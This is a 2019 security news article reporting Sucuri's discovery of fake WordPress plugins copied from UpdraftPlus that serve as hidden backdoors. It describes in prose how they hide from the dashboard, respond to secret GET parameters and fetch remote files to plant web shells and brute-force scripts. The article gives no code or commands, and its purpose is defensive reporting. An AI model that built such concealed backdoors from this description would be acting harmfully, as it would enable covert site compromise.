21 October 2019

Hackers use fake UpdraftPlus plugins to backdoor WordPress websites

Hackers use fake UpdraftPlus plugins to backdoor WordPress websites

Malicious actors utilize fake plugins with backdoor capabilities that hide in plain sight to compromise and maintain the access to WordPress websites, and to upload web shells and scripts for brute-forcing other sites. The researchers at Sucuri have spotted several such plugins (named initiatorseo or updrat123) that are based on the structure of the popular backup/restore plugin UpdraftPlus, which has more than 2 million active installations and is regularly updated by contributors. 

“The metadata comments within these fake plugins include copies from version 1.16.16 of UpdraftPlus, which was released on July 23rd, 2019,” the researchers said.

The malicious plugins hide themselves in the WordPress dashboard from anyone who doesn’t use browsers with specific User-Agent strings. These strings vary from plugin to plugin. Such plugins can easily be created with the help of ready-made automated tools or by including malicious payloads such as web shells within the source code of legitimate ones.

According to Sucuri, the fake plugin will also announce its presence if attackers add a specific GET parameter to requests, such as initiationactivity or testingkey. The main purpose of these plugins is to serve as a backdoor allowing the hackers to upload web shells containing a script used for brute-forcing other websites to different root directories of compromised site. This script is used to test lists of username/password pairs on targeted WordPress sites.

To upload arbitrary files on compromised site the attackers use POST requests, which specify a remote URL for the file download locations, along with the path and name of the file to be created on the compromised server. The names of these POST parameters are unique for each analysed plugin, the researchers found.

“While none of the approaches used by this attack are new, it clearly demonstrates how cleaning only the visible parts of an infection is not enough. Hackers want to maintain access to websites as long as they can. To accomplish this, they upload various backdoors into random files scattered across the whole site. Sometimes backdoors come in the form of WordPress plugins that might not even be visible from the admin interface,” the researchers concluded. They also added that compromised websites may be leveraged as a platform to launch attacks invisible from outside, such as DDoS and brute-force attacks, spam or cryptomining operations.


Back to the list

Latest Posts

New group of hackers targets businesses with backdoor malware in financially-motivated attacks

New group of hackers targets businesses with backdoor malware in financially-motivated attacks

The TA2101 gang used malicious emails to infect organizations in Germany, Italy, and the United States with backdoor, banking Trojan, or ransomware malware.
15 November 2019
APT33 hackers set up their own VPN network to thwart tracking

APT33 hackers set up their own VPN network to thwart tracking

APT33 used its private VPN network for reconnaissance of networks that are relevant to the supply chain of the oil industry.
14 November 2019
New unusual ransomware is hunting for enterprise servers

New unusual ransomware is hunting for enterprise servers

New PureLocker ransomware seems to have links to the malware provider used by Cobalt and FIN6 hacking groups.
13 November 2019
Featured vulnerabilities
Debian update for postgresql-common
Low Patched | 15 Nov, 2019
Cross-site scripting in Pimcore
Low Patched | 15 Nov, 2019
Multiple vulnerabilities in Pimcore
Medium Patched | 15 Nov, 2019